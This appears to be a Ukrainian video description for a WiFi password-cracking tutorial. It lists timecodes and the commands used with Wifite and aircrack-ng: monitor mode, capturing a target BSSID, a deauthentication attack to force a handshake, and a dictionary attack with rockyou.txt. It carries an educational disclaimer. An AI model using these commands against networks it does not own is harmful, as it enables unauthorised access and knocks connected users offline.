Увага! Дане відео несе виключно навчальний характер, все мережеве обладнання використане в відео належить нам, не намагайтесь використати навички, отримані в даному відео для отримання доступу до чужих мереж. Ідеєю даного відео є показати вразливості wifi мереж а також важливість складних паролів.
Disclaimer: This video is for educational purposes only, all equipment used in this video is our own, do not try to use skills acquired from this video to get access to unauthorised networks.
Таймкоди
0:00 – Вступ
00:44 – Спосіб перший (Fern wifi cracker)
00:3:28 – Спосіб другий (Wifite)
00:4:53 – Спосіб третій (aircrack-ng)
00:9:11 – Перевірка валідності отриманого паролю
Використані команди:
—— Спосіб №2 (wifite) ——
Перевірити підключені девайси щоб обрати необхідний модуль:
– iwconfig
Перевести модуль в режим моніторингу:
– sudo airmon-ng start wlan1
Перевірити чи вдалось запустити режим моніторингу (модуль тепер повинен містити приставку mon):
– iwconfig
Запустити wifite:
– sudo wifite
І далі слідуємо командам, спершу вибираємо модуль, який переведений в монітормод, а далі і вайфай який нас цікавить. Вибір за допомогою цифр на клавіатурі
—— Спосіб №3 ——
Перевірити наявні девайси:
– iwconfig
Перевести модуль в режим моніторингу
не забудьте вказати назву свого модуля (замість wlan1):
– sudo airmon-ng start wlan1
Перевірити чи вдалось запустити режим моніторингу (модуль тепер повинен містити приставку mon):
– iwconfig
Робимо пошук наявних wifi мереж:
– sudo airodump-ng wlan1mon
ctrl+c щоб зупинити пошук
Тут запам’ятовуємо мак-адресу (BSSID) і канал (CH)
Перевірити тільки вибрану мережу на підключені девайси (обво’язково має бути принаймні 1 девайс підключений), не забудьте вставити свою мак адерсу яку отримали з команди вище:
– sudo airodump-ng wlan1mon -d 68:FF:7B:C4:8E:A2
ctrl+c щоб зупинити пошук
Початок процедури хаку
В 1-ому вікні починаємо процедуру запису всіх даних роутера
Не забудьте вставити свій канал (після -c) і свою мак адресу (після bssid), також можете змінити назву файлу (hack1):
– sudo airodump-ng -w hack1 -c 10 –bssid 68:FF:7B:C4:8E:A2 wlan1mon
В 2-ому вікні процедура деавтентифікації з віфі:
– sudo aireplay-ng –deauth 0 -a 68:FF:7B:C4:8E:A2 wlan1mon
Коли в першому вікні появиться Handshake можна перервати обидва вікна
ctrl+c щоб перервати
Перевірити чи зберігся файл
– Ls
Зупинити режим моніторингу
Airmon-ng stop wlan1mon
Або
service NetworkManager start
Підбір паролю з Hack1 на основі rockyou.txt
Не забудьте вказати свою назву файлу і де він знаходиться:
– aircrack-ng hack1-01.cap -w /home/kali/Downloads/rockyou.txt
rockyou.txt можна скачати з гітхабу (перше посилання в гуглі якщо ввести rockyou.txt)












Будьте першим, хто прокоментує